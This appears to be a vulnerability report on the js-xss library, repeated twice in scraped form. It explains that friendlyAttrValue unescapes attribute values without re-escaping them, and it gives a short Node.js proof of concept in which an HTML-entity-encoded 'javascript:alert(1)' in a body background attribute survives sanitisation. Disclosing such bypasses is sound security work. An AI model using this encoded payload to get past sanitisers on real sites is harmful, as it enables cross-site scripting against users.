In the end of this function, however, the unescaped value is not "re-escaped", which results in the bypass of the check for XSS in background or style attributes.
Here is the PoC:
var xss = require("xss");
var html = "<body background=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;></body>"
options = {}
options.whiteList = {
"body": ["background"]
}
var html = xss(html, options);
console.log(html);
The above code emits the following html code:
<body background="javascript:alert(1)"></body>
Since we should no longer care about Internet Explorer, this is not a big problem I think.
In
safeAttrValue
, we can see thatfriendlyAttrValue
unescapes the attribute value. https://github.com/leizongmin/js-xss/blob/master/lib/default.js#L149In the end of this function, however, the unescaped value is not "re-escaped", which results in the bypass of the check for XSS in background or style attributes.
Here is the PoC:
The above code emits the following html code:
<body background="javascript:alert(1)"></body>
Since we should no longer care about Internet Explorer, this is not a big problem I think.